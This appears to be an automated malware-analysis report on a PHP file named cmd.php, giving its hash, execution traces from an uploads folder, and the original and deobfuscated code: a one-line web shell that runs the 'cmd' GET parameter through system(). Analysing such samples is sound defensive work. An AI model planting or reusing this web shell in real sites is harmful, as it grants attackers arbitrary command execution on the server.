PHP Malware Analysis

cmd.php

md5: 442bd4935015329c96c268c6ef11d205

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

system($_GET['cmd']);

Execution traces

data/traces/442bd4935015329c96c268c6ef11d205_trace-1676261728.189.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:15:54.086862]
1	0	1	0.000234	393512
1	3	0	0.000284	393896	{main}	1		/var/www/html/uploads/cmd.php	0	0
2	4	0	0.000324	393896	system	0		/var/www/html/uploads/cmd.php	2	1	NULL
2	4	1	0.000350	393928
2	4	R			FALSE
1	3	1	0.000365	393896
			0.000392	314224
TRACE END   [2023-02-13 02:15:54.087062]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
system($_GET['cmd']);